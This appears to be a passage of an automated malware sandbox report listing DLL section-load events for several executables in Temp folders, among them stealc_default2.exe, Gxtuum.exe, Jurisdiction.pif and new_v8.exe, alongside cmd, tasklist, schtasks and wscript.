Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Section loaded: cryptbase.dll
